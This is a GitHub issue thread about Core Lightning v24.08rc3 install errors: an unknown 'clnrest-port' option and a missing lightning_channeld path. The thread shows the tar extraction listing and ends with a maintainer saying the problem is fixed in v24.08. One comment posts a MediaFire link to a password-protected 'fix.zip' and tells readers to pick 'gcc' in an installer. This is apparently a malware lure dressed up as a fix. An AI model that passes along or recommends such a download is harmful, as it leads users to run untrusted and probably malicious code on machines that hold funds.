### ISSUE TITLE
 clightning-v24.08rc3-Ubuntu-20.04.tar.xz | 2 issues: clnrest-port: unknown option. Also missing path/file

### ISSUE THREAD

**Issue by TheMonsterz** [ElementsProject/lightning#7619]
I followed the instuctions at the "offical docs". My first cln install was 24.05 but I've been having repeated issues with sending payments despite very adaquate liquidity. I was hoping an upgrade might do the trick but I'm experiencing the problems listed below (this happened when I test 24.08rc1 on ubuntu22.04 as well)

Most everything on this system is stock ubuntu.

```
~/Downloads$ sudo tar -xvf clightning-v24.08rc3-Ubuntu-22.04.tar.xz -C /usr/local --strip-components=2
[sudo] password for user: 
./usr/bin/
./usr/bin/lightning-cli
./usr/bin/lightning-hsmtool
./usr/bin/lightningd
./usr/bin/reckless
./usr/libexec/
./usr/libexec/c-lightning/
./usr/libexec/c-lightning/lightning_channeld
./usr/libexec/c-lightning/lightning_closingd
./usr/libexec/c-lightning/lightning_connectd
./usr/libexec/c-lightning/lightning_dualopend
./usr/libexec/c-lightning/lightning_gossipd
./usr/libexec/c-lightning/lightning_hsmd
./usr/libexec/c-lightning/lightning_onchaind
./usr/libexec/c-lightning/lightning_openingd
./usr/libexec/c-lightning/lightning_websocketd
./usr/libexec/c-lightning/plugins/
./usr/libexec/c-lightning/plugins/autoclean
./usr/libexec/c-lightning/plugins/bcli
./usr/libexec/c-lightning/plugins/bookkeeper
./usr/libexec/c-lightning/plugins/chanbackup
./usr/libexec/c-lightning/plugins/cln-askrene
./usr/libexec/c-lightning/plugins/cln-grpc
./usr/libexec/c-lightning/plugins/cln-renepay
./usr/libexec/c-lightning/plugins/clnrest/
./usr/libexec/c-lightning/plugins/clnrest/.github/
./usr/libexec/c-lightning/plugins/clnrest/.github/screenshots/
./usr/libexec/c-lightning/plugins/clnrest/.github/screenshots/Postman-bkpr-plugin.png
./usr/libexec/c-lightning/plugins/clnrest/.github/screenshots/Postman-with-body.png
./usr/libexec/c-lightning/plugins/clnrest/.github/screenshots/Postman.png
./usr/libexec/c-lightning/plugins/clnrest/.github/screenshots/Swagger-auth.png
./usr/libexec/c-lightning/plugins/clnrest/.github/screenshots/Swagger-list-methods.png
./usr/libexec/c-lightning/plugins/clnrest/.github/screenshots/Swagger-rpc-method.png
./usr/libexec/c-lightning/plugins/clnrest/.github/screenshots/Swagger.png
./usr/libexec/c-lightning/plugins/clnrest/Makefile
./usr/libexec/c-lightning/plugins/clnrest/__init__.py
./usr/libexec/c-lightning/plugins/clnrest/clnrest
./usr/libexec/c-lightning/plugins/clnrest/clnrest.py
./usr/libexec/c-lightning/plugins/clnrest/poetry.lock
./usr/libexec/c-lightning/plugins/clnrest/pyproject.toml
./usr/libexec/c-lightning/plugins/clnrest/utilities/
./usr/libexec/c-lightning/plugins/clnrest/utilities/__init__.py
./usr/libexec/c-lightning/plugins/clnrest/utilities/generate_certs.py
./usr/libexec/c-lightning/plugins/clnrest/utilities/rpc_plugin.py
./usr/libexec/c-lightning/plugins/clnrest/utilities/rpc_routes.py
./usr/libexec/c-lightning/plugins/clnrest/utilities/shared.py
./usr/libexec/c-lightning/plugins/commando
./usr/libexec/c-lightning/plugins/funder
./usr/libexec/c-lightning/plugins/keysend
./usr/libexec/c-lightning/plugins/offers
./usr/libexec/c-lightning/plugins/pay
./usr/libexec/c-lightning/plugins/recklessrpc
./usr/libexec/c-lightning/plugins/recover
./usr/libexec/c-lightning/plugins/spenderp
./usr/libexec/c-lightning/plugins/sql
./usr/libexec/c-lightning/plugins/topology
./usr/libexec/c-lightning/plugins/txprepare
./usr/libexec/c-lightning/plugins/wss-proxy/
./usr/libexec/c-lightning/plugins/wss-proxy/Makefile
./usr/libexec/c-lightning/plugins/wss-proxy/poetry.lock
./usr/libexec/c-lightning/plugins/wss-proxy/pyproject.toml
./usr/libexec/c-lightning/plugins/wss-proxy/wss-proxy
./usr/libexec/c-lightning/plugins/wss-proxy/wss-proxy.py
./usr/libexec/c-lightning/plugins/wss-proxy/wss_proxy/
./usr/libexec/c-lightning/plugins/wss-proxy/wss_proxy/__init__.py
./usr/share/
./usr/share/doc/
./usr/share/doc/c-lightning/
./usr/share/doc/c-lightning/LICENSE
./usr/share/doc/c-lightning/README.md
./usr/share/man/
./usr/share/man/man1/
./usr/share/man/man1/lightning-cli.1
./usr/share/man/man5/
./usr/share/man/man5/lightningd-config.5
./usr/share/man/man7/
./usr/share/man/man7/lightning-addgossip.7
./usr/share/man/man7/lightning-addpsbtoutput.7
./usr/share/man/man7/lightning-askrene-create-channel.7
./usr/share/man/man7/lightning-askrene-disable-node.7
./usr/share/man/man7/lightning-askrene-inform-channel.7
./usr/share/man/man7/lightning-askrene-listlayers.7
./usr/share/man/man7/lightning-askrene-reserve.7
./usr/share/man/man7/lightning-askrene-unreserve.7
./usr/share/man/man7/lightning-autoclean-once.7
./usr/share/man/man7/lightning-autoclean-status.7
./usr/share/man/man7/lightning-batching.7
./usr/share/man/man7/lightning-bkpr-channelsapy.7
./usr/share/man/man7/lightning-bkpr-dumpincomecsv.7
./usr/share/man/man7/lightning-bkpr-inspect.7
./usr/share/man/man7/lightning-bkpr-listaccountevents.7
./usr/share/man/man7/lightning-bkpr-listbalances.7
./usr/share/man/man7/lightning-bkpr-listincome.7
./usr/share/man/man7/lightning-blacklistrune.7
./usr/share/man/man7/lightning-check.7
./usr/share/man/man7/lightning-checkmessage.7
./usr/share/man/man7/lightning-checkrune.7
./usr/share/man/man7/lightning-close.7
./usr/share/man/man7/lightning-commando-blacklist.7
./usr/share/man/man7/lightning-commando-listrunes.7
./usr/share/man/man7/lightning-commando-rune.7
./usr/share/man/man7/lightning-commando.7
./usr/share/man/man7/lightning-connect.7
./usr/share/man/man7/lightning-createinvoice.7
./usr/share/man/man7/lightning-createonion.7
./usr/share/man/man7/lightning-createrune.7
./usr/share/man/man7/lightning-datastore.7
./usr/share/man/man7/lightning-datastoreusage.7
./usr/share/man/man7/lightning-decode.7
./usr/share/man/man7/lightning-decodepay.7
./usr/share/man/man7/lightning-deldatastore.7
./usr/share/man/man7/lightning-delforward.7
./usr/share/man/man7/lightning-delinvoice.7
./usr/share/man/man7/lightning-delpay.7
./usr/share/man/man7/lightning-deprecations.7
./usr/share/man/man7/lightning-dev-forget-channel.7
./usr/share/man/man7/lightning-disableinvoicerequest.7
./usr/share/man/man7/lightning-disableoffer.7
./usr/share/man/man7/lightning-disconnect.7
./usr/share/man/man7/lightning-emergencyrecover.7
./usr/share/man/man7/lightning-feerates.7
./usr/share/man/man7/lightning-fetchinvoice.7
./usr/share/man/man7/lightning-fundchannel.7
./usr/share/man/man7/lightning-fundchannel_cancel.7
./usr/share/man/man7/lightning-fundchannel_complete.7
./usr/share/man/man7/lightning-fundchannel_start.7
./usr/share/man/man7/lightning-funderupdate.7
./usr/share/man/man7/lightning-fundpsbt.7
./usr/share/man/man7/lightning-getinfo.7
./usr/share/man/man7/lightning-getlog.7
./usr/share/man/man7/lightning-getroute.7
./usr/share/man/man7/lightning-getroutes.7
./usr/share/man/man7/lightning-help.7
./usr/share/man/man7/lightning-invoice.7
./usr/share/man/man7/lightning-invoicerequest.7
./usr/share/man/man7/lightning-keysend.7
./usr/share/man/man7/lightning-listchannels.7
./usr/share/man/man7/lightning-listclosedchannels.7
./usr/share/man/man7/lightning-listconfigs.7
./usr/share/man/man7/lightning-listdatastore.7
./usr/share/man/man7/lightning-listforwards.7
./usr/share/man/man7/lightning-listfunds.7
./usr/share/man/man7/lightning-listhtlcs.7
./usr/share/man/man7/lightning-listinvoicerequests.7
./usr/share/man/man7/lightning-listinvoices.7
./usr/share/man/man7/lightning-listnodes.7
./usr/share/man/man7/lightning-listoffers.7
./usr/share/man/man7/lightning-listpays.7
./usr/share/man/man7/lightning-listpeerchannels.7
./usr/share/man/man7/lightning-listpeers.7
./usr/share/man/man7/lightning-listsendpays.7
./usr/share/man/man7/lightning-listsqlschemas.7
./usr/share/man/man7/lightning-listtransactions.7
./usr/share/man/man7/lightning-makesecret.7
./usr/share/man/man7/lightning-multifundchannel.7
./usr/share/man/man7/lightning-multiwithdraw.7
./usr/share/man/man7/lightning-newaddr.7
./usr/share/man/man7/lightning-notifications.7
./usr/share/man/man7/lightning-offer.7
./usr/share/man/man7/lightning-openchannel_abort.7
./usr/share/man/man7/lightning-openchannel_bump.7
./usr/share/man/man7/lightning-openchannel_init.7
./usr/share/man/man7/lightning-openchannel_signed.7
./usr/share/man/man7/lightning-openchannel_update.7
./usr/share/man/man7/lightning-parsefeerate.7
./usr/share/man/man7/lightning-pay.7
./usr/share/man/man7/lightning-ping.7
./usr/share/man/man7/lightning-plugin.7
./usr/share/man/man7/lightning-preapproveinvoice.7
./usr/share/man/man7/lightning-preapprovekeysend.7
./usr/share/man/man7/lightning-reckless.7
./usr/share/man/man7/lightning-recover.7
./usr/share/man/man7/lightning-recoverchannel.7
./usr/share/man/man7/lightning-renepay.7
./usr/share/man/man7/lightning-renepaystatus.7
./usr/share/man/man7/lightning-reserveinputs.7
./usr/share/man/man7/lightning-sendcustommsg.7
./usr/share/man/man7/lightning-sendinvoice.7
./usr/share/man/man7/lightning-sendonion.7
./usr/share/man/man7/lightning-sendpay.7
./usr/share/man/man7/lightning-sendpsbt.7
./usr/share/man/man7/lightning-setchannel.7
./usr/share/man/man7/lightning-setconfig.7
./usr/share/man/man7/lightning-setpsbtversion.7
./usr/share/man/man7/lightning-showrunes.7
./usr/share/man/man7/lightning-signinvoice.7
./usr/share/man/man7/lightning-signmessage.7
./usr/share/man/man7/lightning-signpsbt.7
./usr/share/man/man7/lightning-splice_init.7
./usr/share/man/man7/lightning-splice_signed.7
./usr/share/man/man7/lightning-splice_update.7
./usr/share/man/man7/lightning-sql.7
./usr/share/man/man7/lightning-staticbackup.7
./usr/share/man/man7/lightning-stop.7
./usr/share/man/man7/lightning-txdiscard.7
./usr/share/man/man7/lightning-txprepare.7
./usr/share/man/man7/lightning-txsend.7
./usr/share/man/man7/lightning-unreserveinputs.7
./usr/share/man/man7/lightning-upgradewallet.7
./usr/share/man/man7/lightning-utxopsbt.7
./usr/share/man/man7/lightning-wait.7
./usr/share/man/man7/lightning-waitanyinvoice.7
./usr/share/man/man7/lightning-waitblockheight.7
./usr/share/man/man7/lightning-waitinvoice.7
./usr/share/man/man7/lightning-waitsendpay.7
./usr/share/man/man7/lightning-withdraw.7
./usr/share/man/man7/lightningd-rpc.7
./usr/share/man/man7/reckless.7
./usr/share/man/man8/
./usr/share/man/man8/lightning-hsmtool.8
./usr/share/man/man8/lightningd.8
user@workstation:~/Downloads$ lightningd
**lightningd: Config file /home/user/.lightning/config line 14: clnrest-port=3001: unknown option**
```

**Here I change the config to comment out the clnrest-port option and relaunch:**
```
user@workstation:~/Downloads$ nano ~/.lightning/config 
user@workstation:~/Downloads$ lightningd
```
**I'm then met with a "No such file or directory" even though this exact file can be seen getting exacted above. The path `/usr/libexec/c-lightning` does not appear to exist at all, even when viewed with a root terminal:**
`lightningd: Could not run /usr/libexec/c-lightning/lightning_channeld: No such file or directory`

I then re-ran the command to re-install 24.05: 
`~/Downloads$ sudo tar -xvf clightning-v24.08rc3-Ubuntu-22.04.tar.xz -C /usr/local --strip-components=2`

I then uncommented the clnrest-post option in config and it fired right back up. Strangely even with the 24.05 version you can see files being extraced to `/usr/libexec/c-lightning` but that directory still does not appear to exist on the system even tho cln runs fine with 24.05

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ShahanaFarooqui** [comment]
Fixed in v24.08 with PR #7618.
